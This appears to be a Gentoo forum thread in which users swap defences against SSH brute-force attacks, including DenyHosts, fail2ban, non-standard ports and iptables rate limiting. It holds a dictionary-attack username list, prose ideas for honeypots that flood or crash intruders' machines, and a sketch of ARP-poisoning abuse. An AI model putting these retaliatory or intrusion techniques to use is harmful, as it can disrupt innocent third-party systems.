Usernames spam, erin, draco, bank, 123, abc123, abc, ghost, admin, nobody, ftpuser, allan, dummy, public, test, danny, linda, www, www-data, info, sales, oracle, support, testing, yamaguchi, alonso, cynthia, stefan, fuck, karl, ed, angela, fred, amy, pgsql, upload, chris, pop, franklin, andrew, owner, owners, op, db, anita, bind, ben, beny, bert, alin, theo, philip, roland, emil, enzo, felix, francis, ian, ismail, jared42, akcesbenefit, greg, cs, wwwrun, rolo, web1, matt, web, anonymous, apples, xxx, miller, chicago, tweety, snoopy, ashley, bandit, madison, princess, viper, francois, mortimer, lucas, leslie, leroy, lara, sec2, sec1, sec, kassa, maneager, maneager1, emi, emiliano, cafe, internet, play, open, samba, kathi, cgi, nicole, denied, work, cyborg, right, file, text, gnome, kde, lftp, ventas, spg, jag, ag1, ac, lm, aa, jg, khan, rmgadm!, rmgadmin, daniel, hectorh, epanchi, pvm, junkbust, radvd, dennis vivian, larry, jacob, game, cvs, benahmed, rachafi, ramamurthy, tia, ricky, nuzahar, cindy, bernard, ace-html, bestrella, darcos, vojeda, smakom, bannamuki, yoshida, tunekiyo, yakayama, t-miyata, t-ikeda, shigeno, mizoguti, kyoda, kawano, jinta, horii, eigyou, dozono, denryoku, anthony, hunter, joshua, exit, juan, nathan, william, yusaf, sitasubedi, sanjiv, sagun, rajen, kamal, arun, aroon, smc, tcp, log, logs, administrator, jack, marvin, andrea, barbara, adine, alan, albert, alberto, alex, alfred, ali, alice, allan, andi, andrew, student, r00t, download, nigel, upload, services, office, bobby, username, sharon, aron, brett, alex, mike, data, http, httpd, shop, ........................ many many many more, and those were all from 222.122.21.202 just yesterday.  :Smile: 

I should install DShield on my Smoothwall. That would be cool to see how much it lessens the impact. I have been using public-key auth since I first saw the attacks last October. My passwords are fine, but I'm afraid some of my users probably use bad passwords.

I would like to block all of these attempts simply to save processor cycles, Internet congestion, and intranet congestion. I thought about installing that 'reactive' firewall mod for Smoothwall too... too many connection attempts within so many seconds from a given IP and it automagically firewalls that IP.

J

----------

## kamikaze04

yottabit, you would like to test : Denyhosts , great program, and it blocks ips doing dictionary attacks perfectly. I really recommend it. My servers passed from thousands of login attempts in a month to 10 in a day  :Smile: 

----------

## yottabit

 *kamikaze04 wrote:*   

> yottabit, you would like to test : Denyhosts , great program, and it blocks ips doing dictionary attacks perfectly. I really recommend it. My servers passed from thousands of login attempts in a month to 10 in a day 

 

Excellent tool and already in Portage. Thanks!!

----------

## LostControl

 *kamikaze04 wrote:*   

> yottabit, you would like to test : Denyhosts , great program, and it blocks ips doing dictionary attacks perfectly. I really recommend it. My servers passed from thousands of login attempts in a month to 10 in a day 

 

You can also try fail2ban  :Wink: 

----------

## Bigun

Guh, I now have an 11 Mb log of nothing but SSH login attempts!

This is old, anyway possible to honeypot the attempts to make it quit hogging bandwidth?

I attempted to stop sshd but the script wouldn't stop trying.

I mean, make some lame username like "a" with the password "a" and make the default shell /dev/null or something.

----------

## Barnoid

 *bigun89 wrote:*   

> Guh, I now have an 11 Mb log of nothing but SSH login attempts!
> 
> This is old, anyway possible to honeypot the attempts to make it quit hogging bandwidth?
> 
> I attempted to stop sshd but the script wouldn't stop trying.
> ...

 

It's been said before, I'll say it again: change the port of your SSH server. It's that simple. I haven't had one incident since I've changed it (~2 years ago).

----------

## Adrien

 *Barnoid wrote:*   

> It's been said before, I'll say it again: change the port of your SSH server. It's that simple. I haven't had one incident since I've changed it (~2 years ago).

 

I'm not sure it's definitely the best idea as most of ssh bruteforce attacks start with a portscan.

----------

## piercey

 *Adrien wrote:*   

>  *Barnoid wrote:*   It's been said before, I'll say it again: change the port of your SSH server. It's that simple. I haven't had one incident since I've changed it (~2 years ago). 
> 
> I'm not sure it's definitely the best idea as most of ssh bruteforce attacks start with a portscan.

 

A regular portscan wont go over a certain number of ports anyway, so choosing a high enough port is another way around this problem.

Of course not everyone can just change their port number, and thats why these tools exist.

----------

## linuxgeekery

I've had several hundred breakin attempts over the last 2 days. I created a 'test test' account with a honeypot script as it's shell. So when the hacker gets in, he'll be greeted with a message saying "Sorry, this box is secured. =)" and a "cat /dev/urandom". It also logs the IP address and sends it to a log.

----------

## assaf

 *linuxgeekery wrote:*   

> and a "cat /dev/urandom"

 

I'm sure the poor hacker will be crying himself to sleep tonight   :Razz: 

----------

## MrUlterior

 *linuxgeekery wrote:*   

> I've had several hundred breakin attempts over the last 2 days. I created a 'test test' account with a honeypot script as it's shell. So when the hacker gets in, he'll be greeted with a message saying "Sorry, this box is secured. =)" and a "cat /dev/urandom". It also logs the IP address and sends it to a log.

 

So, in order to DoS you I just need to connect as test/test several hundred times till I saturate your connection.... that's smart!  :Razz: 

----------

## vectox

Lol..gotta love that last one.  I think it's better to reduce the load on the system completely.  Your right...a few hundred attempts and the system is overloaded with honeypot processes.  Sure it's cool on a user level, but most of these attempts are scripted and flooding the Internet with hundreds of attempts and the hacker is never going to see you "this box is secure msg".  Use metalog...so it puts all sshd events in an sshd folder seperate from the syslog....save yourself greping the syslog file.  I had ssh running on the standard ol port 22 for a while.....I got tons of brute force attempts...mostly from Korea, China and a small number from the US....reporting them all is a wasted effort...and most of them I would guess are just zombie boxes anyway...not the actual hackers box.

My solution, same as the person above, is to just change the port your running sshd on.  It's simple....no extra processing on your server and unless your server is public to many users expecting to ssh to port 22.....your likely the only one logging onto it anyway.  It still allows you to log onto it from anywhere in the world.  Also like the user above I've been running sshd on a non-standard high port and haven't had one brute force attempt since...all the failed password attempts are by yours truly  :Smile: .

Suck it up people...change the stupid port!

----------

## Bigun

*snip*

 *vectox wrote:*   

> ...Use metalog...so it puts all sshd events in an sshd folder seperate from the syslog....save yourself greping the syslog file....

 

*snip*

Syslog-ng is capable as well.

https://forums.gentoo.org/viewtopic-t-399997-highlight-ssh.html

----------

## RBH

I feel left out: despite having had a static IP for nearly 2 and a half years, I've not had one failed SSH login appear in my logs that wasn't my own doing. I run chkrootkit periodically (i.e. when I'm logged in finding things to do) and have never found anything.

I expect this is because my boxes are always behind a router that denies all packets that aren't specifically permitted (HTTP, DNS et al). Do you guys all connect directly, or something? Wouldn't a hardware router - just a bog standard Netgear one - be a good idea?

I might be talking out of my backside and apologies if that's the case, but this seems to be something of an obvious step to take.

----------

## Bigun

 *RBH wrote:*   

> I feel left out: despite having had a static IP for nearly 2 and a half years, I've not had one failed SSH login appear in my logs that wasn't my own doing. I run chkrootkit periodically (i.e. when I'm logged in finding things to do) and have never found anything.
> 
> I expect this is because my boxes are always behind a router that denies all packets that aren't specifically permitted (HTTP, DNS et al). Do you guys all connect directly, or something? Wouldn't a hardware router - just a bog standard Netgear one - be a good idea?
> 
> I might be talking out of my backside and apologies if that's the case, but this seems to be something of an obvious step to take.

 

It depends, my box *IS* the router, therefore having a NetGear router in front of it is mundane and rickety.  

Besides, I trust the security of a Gentoo box that I manage 10 fold over a homegrade NetGear router.

Yes, it's added security in the physical sense.  But it's one more thing to break, one more thing to manage, and one more thing to go wrong.  If your Gentoo box takes care of it, along with the added bonus of being able to log it, why put in a router at all?

----------

## assaf

 *RBH wrote:*   

> I feel left out: despite having had a static IP for nearly 2 and a half years, I've not had one failed SSH login appear in my logs that wasn't my own doing. I run chkrootkit periodically (i.e. when I'm logged in finding things to do) and have never found anything.
> 
> I expect this is because my boxes are always behind a router that denies all packets that aren't specifically permitted (HTTP, DNS et al). Do you guys all connect directly, or something? Wouldn't a hardware router - just a bog standard Netgear one - be a good idea?
> 
> I might be talking out of my backside and apologies if that's the case, but this seems to be something of an obvious step to take.

 

If your router does not allow ssh then what's the point? You may as well not run sshd at all, or if you want to access it only from the LAN you could add a simple iptables rule.

----------

## linuxgeekery

Update on that script that I talked about a few pages before. Thanks for people pointing out the flaws. I added to the script a section that runs another script. That script runs a "ps aux" every minute, with some sed and grep action. If there are more than 30 instances of the honeypot, it kills off all of the honeypots using kill -9 and pidof.

----------

## MrUlterior

 *linuxgeekery wrote:*   

> Update on that script that I talked about a few pages before. Thanks for people pointing out the flaws. I added to the script a section that runs another script. That script runs a "ps aux" every minute, with some sed and grep action. If there are more than 30 instances of the honeypot, it kills off all of the honeypots using kill -9 and pidof.

 

Which makes the assumption that I can't make sufficient connections to your machine in under a minute to bring it down ... worse still it means I could use YOU to make a DoS attack, all I have to do is poison your ARP cache to make you think that my IP is infact the desired target, and suddenly you're sending the contents of /dev/random to a complete inoccent. The puzzled expression on your face when your ISP annuls your contract & requests your presence in court will be priceless.

Getting the picture? Counter-measures you don't understand are more dangerous to you than the undesirables you're trying to dissuade from bothering you.

----------

## MrUlterior

 *linuxgeekery wrote:*   

> Update on that script that I talked about a few pages before. Thanks for people pointing out the flaws. I added to the script a section that runs another script. That script runs a "ps aux" every minute, with some sed and grep action. If there are more than 30 instances of the honeypot, it kills off all of the honeypots using kill -9 and pidof.

 

Or if you want to do this properly, see connection tarpitting. This is a method used often in anti-spam, which subtly alters the TCP response to an identified attacker effectively trapping them .. I'll leave you to do your research.

----------

## erikstotle

I have a hardware router and I still get those ssh attacks.  They get incessently annoying.  I suggesst that you install iptables and then use dynfw (it's not in portage, you can get it from http://www.gentoo.org/doc/en/articles/files/dynfw-1.0.1.tar.bz2).  Once you have that installed, you can block ips and limit the number of new connections per minute/hour/day on a port on the fly.  For example, since I only use ssh for remote administration, I limit the number of new connections per minute on port 22 to 1.  This does get annoying if you login incorrectly because you have to wait a minute before trying again, but it does make the ssh cracking scripts give up quite quickly.  And even if it doesn't give up, only about 1/60th of it's login attempts get through.

For further reading go to this rather humerous article:

http://www.gentoo.org/doc/en/articles/dynamic-iptables-firewalls.xml

----------

## Bigun

~~snip~~

 *erikstotle wrote:*   

> For further reading go to this rather humerous article:
> 
> http://www.gentoo.org/doc/en/articles/dynamic-iptables-firewalls.xml

 

I really like the ipdrop script, I'm going to start a thread in the programming forum to see if I can get it to run a bit better.

----------

## minskpower

To everybody complaining about ssh flooding - why don't you change the port to something else, you won't be bothered by those worms, they don't generally scan the upper ports, even if they do I doubt they can recognise it's running ssh (at this time). This solution applies if you are not limited by a third party firewall.

----------

## Bigun

The IPdrop script stops the attacks in their tracks.  I only wish there was a script that ran in the background to detect such attacks and add the IP to the droplist automatically.

----------

## dpetka2001

hello just got back home and observed a strange in my computer...some files and directories were deleted and i found them in the Trash Can...the thing is that they were in different spots in my Desktop and is very unlikely that someone might accedentaly deleted them without having selected all of them on his own...i think i might have been hacked but am not really sure about it...how could i verify if i was hacked or not?? could you please show me the way to do this because i don't really know how to do it?? thanks in advance...

----------

## Bigun

Heh.... typically when your hacked, they don't move your icons or move stuff to your trash bin.

Try going to a more secure password and locking your bedroom door.

----------

## dpetka2001

well i don't think that anyone from my family would do such a thing...the don't know much of computers...anyway...is there something that i could check in order to find out if there was any attempt??

----------

## jamapii

Sorry, I was waiting for this to unload my thoughts...

 *erikstotle wrote:*   

> They get incessently annoying.

 

Filter them in syslog  :Wink: 

Seriously, I repeat I think this issue is overrated. Trying 1 to 3 possible passwords on 100 accounts is no threat to security unless you have users with passwords such as "12345", "hello" or username_spelled_backwards.

It would be a threat if there was a security hole in ssh. There will be a threat when there is a known security hole in ssh. To reduce the likelihood of a successful attack, I would recommend a nonstandard port, possibly disabling password logins, possibly portknocking. About any ratelimiting solutions with iptables, be careful, you might lock yourself out. The IP droplist might be good, too, for any attack, but also makes a DOS attack possible (with IP spoofing).

And start worrying about real security problems. Especially if you think WEP provides any security (it doesn't).

----------

## jamapii

 *dpetka2001 wrote:*   

> hello just got back home and observed a strange in my computer...some files and directories were deleted and i found them in the Trash Can...the thing is that they were in different spots in my Desktop

 

looks more like some kind of "practical joke", nothing serious, but it might mean that you have a security hole. Maybe a weak password, maybe vnc or X server access to the world, maybe you left the computer for 5 minutes without xlock

There is a feature in Gnome, maybe called desktop sharing or something, which really is vnc access.

----------

## linuxgeekery

 *MrUlterior wrote:*   

>  *linuxgeekery wrote:*   Update on that script that I talked about a few pages before. Thanks for people pointing out the flaws. I added to the script a section that runs another script. That script runs a "ps aux" every minute, with some sed and grep action. If there are more than 30 instances of the honeypot, it kills off all of the honeypots using kill -9 and pidof. 
> 
> Or if you want to do this properly, see connection tarpitting. This is a method used often in anti-spam, which subtly alters the TCP response to an identified attacker effectively trapping them .. I'll leave you to do your research.

 

This proves once again that I am very incompetent with creating honeypots and things of that sort.   :Wink:  Thanks for the information. I read up on connection tarpitting. Seems interesting...

----------

## dpetka2001

 *jamapii wrote:*   

> looks more like some kind of "practical joke", nothing serious, but it might mean that you have a security hole. Maybe a weak password, maybe vnc or X server access to the world, maybe you left the computer for 5 minutes without xlock
> 
> There is a feature in Gnome, maybe called desktop sharing or something, which really is vnc access.

 well a friend of mine checked on my system with Nessus and told me that it found only 2 services running...a pop server (freepops) and a web server (amuleweb)...i don't have any services running except from the above mentioned...i don't think i have a weak password as it is 9 characters long including numbers...there's no vnc running...i run KDE and am not aware of any such feature nor do i know if it's activitated by default...how can i activate xlock if there is such thing in KDE?? thanks...

----------

## mpicklesimer

I have an OpenBSD box running 'pf' for the firewall on my home network. I'm wondering if it would be worth the time to block all traffic coming from those ips? What would you suggest (if different) if I were talking about a business site? Not that much of this matters, cuz I'm using strong keys instead of passwords, but I'm just curious.

----------

## Bigun

I'm putting a honeypot on my server with the username/password test.

It basically logs the date and time the script is executed, then cats /dev/random to them until the bot forces the machine's RAM to spill over to SWAP and eventually DoS.  Aside from wasting bandwidth that I have plenty to spare of, it should also help alert the server-admin to trouble.

And to cover my buttocks, there is a message in my sshd.motd that says unauthorized access is prohibited.

----------

